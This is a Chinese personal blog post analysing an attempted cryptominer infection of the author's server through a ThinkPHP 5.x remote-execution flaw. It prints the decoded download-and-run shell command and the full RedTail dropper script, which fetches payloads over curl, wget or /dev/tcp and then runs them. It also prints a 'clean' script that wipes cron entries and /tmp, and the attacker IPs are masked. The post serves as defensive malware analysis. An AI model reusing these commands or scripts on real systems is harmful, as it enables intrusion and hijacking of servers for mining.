<!DOCTYPE html>
<html lang="zh-CN">
<head>

<!-- Iushm OK -->
<title>2024年12月14日发现的攻击行为分析 Cy Sakarwei GHP</title>
<link href="/favicon.svg" type="image/svg" rel="shotcut icon"/>

	
<link rel="stylesheet" href="/suk_ghp/res/index.css">



<script src="/suk_ghp/res/saka.js"></script>

<meta charset="UTF-8">
<meta name="author" content="Saka">
<meta name="description" content="Sun Dec 15 2024 00:00:00 GMT+0800 记录网站运行中的发现的一些迷惑请求。其实这个只是冰山一角，只是我确实没有多少时间整理，就先上载这个吧。"/>
<meta name="viewport" content="width=device-width,initial-scale=1"/>
<meta name="generator" content="Hexo 7.3.0"></head>
<!-- Igmj KSU je -->
<body>
	<div id="main">
		<div class="page">
			<div class="content">
				<div id="ksu"><a href="/index.html"><img src="/suk_ghp/res/root.gif"/></a><a href="/suk_ghp/index.html"><img src="/suk_ghp/res/home.gif"/></a>&nbsp;SakaGHP Blog<hr/></div>
				<section id="iushm">
					
<h1>2024年12月14日发现的攻击行为分析</h1>
<div class="irfrtani">
	<m>於</m> <time>24年12月15日</time><br/>
	
	<m>作</m>
	<a href="/suk_ghp/authors/tags/Cy-Saka">Saka</a>
	

	


	<p class="iozuta">记录网站运行中的发现的一些迷惑请求。其实这个只是冰山一角，只是我确实没有多少时间整理，就先上载这个吧。</p>
</div>
<h1 id="2024年12月14日解析攻击记录"><a href="#2024年12月14日解析攻击记录" class="headerlink" title="2024年12月14日解析攻击记录"></a>2024年12月14日解析攻击记录</h1><p>　　今天照常检视日志的，又发现一个试图访问敏感目录的家伙。像这样拼命探索敏感位置的家伙，我们一般回复一个“200”一切正常的讯号，然后在返回的内容里面狂飙脏话炮轰这些黑客——其实现在也有，不过缩减了范围而已，专门针对 BotPoke 系列的家伙，虽然他们还没过来扫描我们。<br>　　这样坚持了几天没什么效果，于是就觉得无聊了，把返回大多数改回了应有的404，然后今天倒是是抓到了一些不大对劲的情况——攻击来了，有人试图往我们的公网主机植入挖矿病毒。</p>
<p><img src="https://www.helloimg.com/i/2024/12/15/675db13c9f79d.png" alt="异常内容截图"></p>
<p>　　我们当然不怕他，因为我们的开站程序压根就没有足够的权限满足请求，返回的200只不过就是一句“啊对对对”而已。:吃瓜:</p>
<p>　　首先看看今日的日志节选，上图给出了涉及攻击行为的最最关键内容，此前同一IP多次试图访问敏感内容，发起大量请求，除去因为没有使用HTTPS被打回的301之外，剩下的被全数被我方服务器软体以404为由打回。我们检索得到的情报显示，此IP来自缅甸，使用的作业系统可能是 CentOS，SSH 默认22号端口公网暴露，开设1194、16028两个端口，主机身份不明，有可能是被武器化的失陷主机。不过主机是谁不重要，我比较关心的是攻击者的攻击手段，以及脚本和病毒的行为。</p>
<p>　　先前的日志告诉我们，攻击者试图找出我们的（带有漏洞的）PHPUnit后台，失败，然后才到上图给出的请求链接，听到了一个“200”的回应，立马开始攻击。它给我们的感觉是：这个家伙先猜测我们有采用PHPUnit，然后检索PHPUnit失败，就检索ThinkPHP。最后还真就被他“发现”了一个可以返回相当正常的结果（200）的链接。他大概大喜过望，然后迫不及待地使用了ThinkPHP存在的一个漏洞试图执行Shell。<strong>（网上检索资料显示，ThinkPHP 5.x 的 invokeFunction 接口存在漏洞，可远程执行指令。）</strong> 他后续访问的链接正是去请求让我们的服务器执行一定指令。指令经过URL转码，转回原始字符串后，我们得出它试图执行的指令是：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">X=$(curl http://【某IP位址】/sh || wget http://【某IP位址】/sh -O-); <span class="built_in">echo</span> <span class="string">&quot;<span class="variable">$X</span>&quot;</span> | sh -s thinkphp.selfrep</span><br></pre></td></tr></table></figure>
<p>　　即：下载某IP位址的 sh 文件并执行，而且是利用输出和变量执行的——这或许是为了避免因读写鉴权失败导致的下载失败和执行错误，也可能是为了避免留下文件痕迹。检索得知，这个IP位址，来自德国。</p>
<p>　　我对这个病毒比较感兴趣，于是我就尝试下载了这个sh文件，完整源代码（但隐去IP、添加注释），具体分析过程见下。</p>
<p>　　总体而言，黑客试图在我站试图造访了PHPUnit和ThinkPHP，发现ThinkPHP“似乎有所回应”，然后试图利用漏洞执行脚本，让我站服务器启动挖矿程序。脚本首先进行鉴权，看看现有权限可以操作什么目录，然后尝试创建测试文件打探风声，发现一个可以被拿来安营扎寨的地方就赶紧请来清理大师混进原住民当中为非作歹，为狂军指路，同时清除异见（c3pool_miner），恭迎病毒来到应许之地。<br>　　病毒过来的方法也很简单——如果是可以明确知道CPU架构的，那就OK，下载病毒直接运行，不能的就全都尝试一次，四个都不行那就真是没有地利人和了，耶稣都没办法。<br>　　运行的病毒文件是<code>.redtail</code>。RedTail是一个挖矿程序，挖矿即利用服务器硬件来无休止地替人做题赚钱，让服务器“007”为黑客打工，而且收益全部归黑客所有，服务器及其主任没有报酬。</p>
<p>　　不过我个人目前还没了解 .redtail 会执行什么样的操作，这玩意我也暂时不想也不敢轻举妄动——毕竟网上似乎也已经有有关解说了，而且我手上的资源实在有限，所以我就把样本移交给相关专业的同学就算了。</p>
<hr>
<h2 id="我的简单分析过程"><a href="#我的简单分析过程" class="headerlink" title="我的简单分析过程"></a>我的简单分析过程</h2><p>（注意：除了开头的指定 shell 注释以外，其余注释全部由 Sakarwei 加注）<br>sh:</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Saka 注：这个脚本是在输出和变量中运行的，不依附于文件。</span></span><br><span class="line"><span class="comment">#!/bin/bash</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="title">dlr</span></span>() &#123; <span class="comment"># 下载</span></span><br><span class="line">  wget http://【某IP】/<span class="variable">$1</span> || curl -O http://【某IP】/<span class="variable">$1</span></span><br><span class="line">  <span class="comment"># ↑尝试获取文件</span></span><br><span class="line">  <span class="keyword">if</span> [ $? -ne 0 ]; <span class="keyword">then</span></span><br><span class="line">    <span class="comment"># 如果获取失败，则利用系统功能建立TCP连线，发起HTTP请求替代下载行为</span></span><br><span class="line">    <span class="built_in">exec</span> 3&lt;&gt;<span class="string">&quot;/dev/tcp/【某IP】/80&quot;</span></span><br><span class="line">    <span class="built_in">echo</span> -e <span class="string">&quot;GET /<span class="variable">$1</span> HTTP/1.0\r\nHost: 【某IP】\r\n\r\n&quot;</span> &gt;&amp;3</span><br><span class="line">    (<span class="keyword">while</span> <span class="built_in">read</span> -r line; <span class="keyword">do</span> [ <span class="string">&quot;<span class="variable">$line</span>&quot;</span> = $<span class="string">&#x27;\r&#x27;</span> ] &amp;&amp; <span class="built_in">break</span>; <span class="keyword">done</span> &amp;&amp; <span class="built_in">cat</span>) &lt;&amp;3 &gt;<span class="variable">$1</span></span><br><span class="line">    <span class="built_in">exec</span> 3&gt;&amp;-</span><br><span class="line">    <span class="comment"># ↑关闭连线</span></span><br><span class="line">  <span class="keyword">fi</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment"># 鉴权部分：了解用户不能操作的所有目录并避开</span></span><br><span class="line">NOEXEC_DIRS=$(<span class="built_in">cat</span> /proc/mounts | grep <span class="string">&#x27;noexec&#x27;</span> | awk <span class="string">&#x27;&#123;print $2&#125;&#x27;</span>)</span><br><span class="line">EXCLUDE=<span class="string">&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> <span class="built_in">dir</span> <span class="keyword">in</span> <span class="variable">$NOEXEC_DIRS</span>; <span class="keyword">do</span></span><br><span class="line">  EXCLUDE=<span class="string">&quot;<span class="variable">$&#123;EXCLUDE&#125;</span> -not -path \&quot;<span class="variable">$dir</span>\&quot; -not -path \&quot;<span class="variable">$dir</span>/*\&quot;&quot;</span></span><br><span class="line"><span class="keyword">done</span></span><br><span class="line"></span><br><span class="line">FOLDERS=$(<span class="built_in">eval</span> find / -<span class="built_in">type</span> d -user $(<span class="built_in">whoami</span>) -perm -u=rwx -not -path \&quot;/tmp/*\&quot; -not -path \&quot;/proc/*\&quot; <span class="variable">$EXCLUDE</span> 2&gt;/dev/null)</span><br><span class="line">ARCH=$(<span class="built_in">uname</span> -mp)</span><br><span class="line">OK=<span class="literal">true</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 尝试发见一个可以给恶意软体安家的地方，testfile 是先行探路者</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="variable">$FOLDERS</span> /tmp /var/tmp /dev/shm; <span class="keyword">do</span></span><br><span class="line">  <span class="keyword">if</span> <span class="built_in">cd</span> <span class="string">&quot;<span class="variable">$i</span>&quot;</span> &amp;&amp; <span class="built_in">touch</span> .testfile &amp;&amp; (<span class="built_in">dd</span> <span class="keyword">if</span>=/dev/zero of=.testfile2 bs=2M count=1 &gt;/dev/null 2&gt;&amp;1 || <span class="built_in">truncate</span> -s 2M .testfile2 &gt;/dev/null 2&gt;&amp;1); <span class="keyword">then</span></span><br><span class="line">    <span class="built_in">rm</span> -rf .testfile .testfile2</span><br><span class="line">    <span class="built_in">break</span></span><br><span class="line">  <span class="keyword">fi</span></span><br><span class="line"><span class="keyword">done</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 试图下载 clean，稍后分析涉事脚本</span></span><br><span class="line">dlr clean</span><br><span class="line"><span class="built_in">chmod</span> +x clean</span><br><span class="line">sh clean &gt;/dev/null 2&gt;&amp;1</span><br><span class="line"><span class="built_in">rm</span> -rf clean</span><br><span class="line"></span><br><span class="line"><span class="built_in">rm</span> -rf .redtail</span><br><span class="line"><span class="comment"># 发现一个应许质地，然后混入原住民中，准备迎接病毒来到应许之地。</span></span><br><span class="line"><span class="comment"># 其中只有 x86_64、i686、aarch64、arm7 四种架构CPU的设备才有对应的病毒软体</span></span><br><span class="line"><span class="keyword">if</span> <span class="built_in">echo</span> <span class="string">&quot;<span class="variable">$ARCH</span>&quot;</span> | grep -q <span class="string">&quot;x86_64&quot;</span> || <span class="built_in">echo</span> <span class="string">&quot;<span class="variable">$ARCH</span>&quot;</span> | grep -q <span class="string">&quot;amd64&quot;</span>; <span class="keyword">then</span></span><br><span class="line">  dlr x86_64 <span class="comment"># 从服务器下载病毒</span></span><br><span class="line">  <span class="built_in">mv</span> x86_64 .redtail  <span class="comment"># 重命名，下同</span></span><br><span class="line"><span class="keyword">elif</span> <span class="built_in">echo</span> <span class="string">&quot;<span class="variable">$ARCH</span>&quot;</span> | grep -q <span class="string">&quot;i[3456]86&quot;</span>; <span class="keyword">then</span></span><br><span class="line">  dlr i686</span><br><span class="line">  <span class="built_in">mv</span> i686 .redtail</span><br><span class="line"><span class="keyword">elif</span> <span class="built_in">echo</span> <span class="string">&quot;<span class="variable">$ARCH</span>&quot;</span> | grep -q <span class="string">&quot;armv8&quot;</span> || <span class="built_in">echo</span> <span class="string">&quot;<span class="variable">$ARCH</span>&quot;</span> | grep -q <span class="string">&quot;aarch64&quot;</span>; <span class="keyword">then</span></span><br><span class="line">  dlr aarch64</span><br><span class="line">  <span class="built_in">mv</span> aarch64 .redtail</span><br><span class="line"><span class="keyword">elif</span> <span class="built_in">echo</span> <span class="string">&quot;<span class="variable">$ARCH</span>&quot;</span> | grep -q <span class="string">&quot;armv7&quot;</span>; <span class="keyword">then</span></span><br><span class="line">  dlr arm7</span><br><span class="line">  <span class="built_in">mv</span> arm7 .redtail</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">  OK=<span class="literal">false</span>  <span class="comment"># 不OK，那就全部都尝试一次，忽略错误</span></span><br><span class="line">  <span class="keyword">for</span> a <span class="keyword">in</span> x86_64 i686 aarch64 arm7; <span class="keyword">do</span></span><br><span class="line">    dlr <span class="variable">$a</span></span><br><span class="line">    <span class="built_in">cat</span> <span class="variable">$a</span> &gt;.redtail</span><br><span class="line">    <span class="built_in">chmod</span> +x 其实.redtail</span><br><span class="line">    ./.redtail <span class="variable">$1</span> &gt;/dev/null 2&gt;&amp;1  <span class="comment"># 执行</span></span><br><span class="line">    <span class="built_in">rm</span> -rf <span class="variable">$a</span></span><br><span class="line">  <span class="keyword">done</span></span><br><span class="line"><span class="keyword">fi</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 如果一切顺利，则在服务器内安营扎寨，开始挖矿，迫害CPU内存网络服务器软硬件。</span></span><br><span class="line"><span class="keyword">if</span> [ <span class="variable">$OK</span> = <span class="built_in">tr</span>其实ue ]; <span class="keyword">then</span></span><br><span class="line">  <span class="built_in">chmod</span> +x .redtail</span><br><span class="line">  ./.redtail <span class="variable">$1</span> &gt;/dev/null 2&gt;&amp;1  <span class="comment"># 执行</span></span><br><span class="line"><span class="keyword">fi</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 注：关于“$1”部分，还记得上面黑客试图执行的指令吗？或许其后方的“thinkphp.selfrep”就是这里的“$1”。</span></span><br></pre></td></tr></table></figure>

<p>里面提及了一个脚本，叫作 <code>clean</code>。<br>我也下载了一份并分析，大概就是关停 c3pool_miner（另一挖矿病毒） 、清剿系统缓存目录 和 系统日程表。</p>
<p>clean:</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="title">clean_crontab</span></span>() &#123;</span><br><span class="line">  chattr -ia <span class="string">&quot;<span class="variable">$1</span>&quot;</span></span><br><span class="line">  grep -vE <span class="string">&#x27;wget|curl|/dev/tcp|/tmp|\.sh|nc|bash -i|sh -i|base64 -d&#x27;</span> <span class="string">&quot;<span class="variable">$1</span>&quot;</span> &gt;/tmp/clean_crontab</span><br><span class="line">  <span class="built_in">mv</span> /tmp/clean_crontab <span class="string">&quot;<span class="variable">$1</span>&quot;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">systemctl <span class="built_in">disable</span> c3pool_miner</span><br><span class="line">systemctl stop c3pool_miner</span><br><span class="line"></span><br><span class="line">chattr -ia /var/spool/cron/crontabs</span><br><span class="line"><span class="keyword">for</span> user_cron <span class="keyword">in</span> /var/spool/cron/crontabs/*; <span class="keyword">do</span></span><br><span class="line">  [ -f <span class="string">&quot;<span class="variable">$user_cron</span>&quot;</span> ] &amp;&amp; clean_crontab <span class="string">&quot;<span class="variable">$user_cron</span>&quot;</span></span><br><span class="line"><span class="keyword">done</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> system_cron <span class="keyword">in</span> /etc/crontab /etc/crontabs; <span class="keyword">do</span></span><br><span class="line">  [ -f <span class="string">&quot;<span class="variable">$system_cron</span>&quot;</span> ] &amp;&amp; clean_crontab <span class="string">&quot;<span class="variable">$system_cron</span>&quot;</span></span><br><span class="line"><span class="keyword">done</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> <span class="built_in">dir</span> <span class="keyword">in</span> /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly /etc/cron.d; <span class="keyword">do</span></span><br><span class="line">  chattr -ia <span class="string">&quot;<span class="variable">$dir</span>&quot;</span></span><br><span class="line">  <span class="keyword">for</span> system_cron <span class="keyword">in</span> <span class="string">&quot;<span class="variable">$dir</span>&quot;</span>/*; <span class="keyword">do</span></span><br><span class="line">    [ -f <span class="string">&quot;<span class="variable">$system_cron</span>&quot;</span> ] &amp;&amp; clean_crontab <span class="string">&quot;<span class="variable">$system_cron</span>&quot;</span></span><br><span class="line">  <span class="keyword">done</span></span><br><span class="line"><span class="keyword">done</span></span><br><span class="line"></span><br><span class="line">clean_crontab /etc/anacrontab</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> /tmp /var/tmp /dev/shm; <span class="keyword">do</span></span><br><span class="line">  <span class="built_in">rm</span> -rf <span class="variable">$i</span>/*</span><br><span class="line"><span class="keyword">done</span></span><br></pre></td></tr></table></figure>

<hr>
<h2 id="一些补充"><a href="#一些补充" class="headerlink" title="一些补充"></a>一些补充</h2><p>后续我们也对其它信息进行了对比：</p>
<ul>
<li>对有关IP（病毒存放点IP）：我们认为他或许有伪造服务器运行信息之嫌疑——Telnet 取得的 400 回报，和 Curl 取得的 404 回报返回的Nginx版本不一致。<br><img src="https://www.helloimg.com/i/2024/12/15/675db09cdb1b2.png" alt="疑点：不一致的返回信息"></li>
<li>对有关IP：出现的日期显示，含义尚未明确，可能是失陷时间或 Nginx 更新时间吗？（其实也可能没有关联）<br><img src="https://www.helloimg.com/i/2024/12/15/675db0a63870b.png" alt="日期含义？"></li>
<li>请求对比：疑似出自同一扫描脚本或软体，甚至可能出自同一组织（注：二者 UserAgent 均为「Custom-AsyncHttpClient」）：<br><img src="https://www.helloimg.com/i/2024/12/15/675db0c667944.png" alt="请求链接对比"><br>（左侧为12月14日，右侧为12月8日）</li>
</ul>





				</section>
				<hr/>
				<center>&copy;2014~2024 Sakarwei<br/>除非另有声明，本站内容採用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 授權。<br/>頁末出現本字段之頁面，採用 Hexo 輔助生成<br/><img src="https://badges.toozhao.com/badges/01JC2K3JD6REFRFC50VPEP65MT/blue.svg"/></center>
			</div>
		</div>
	</div>
</body>
</html>
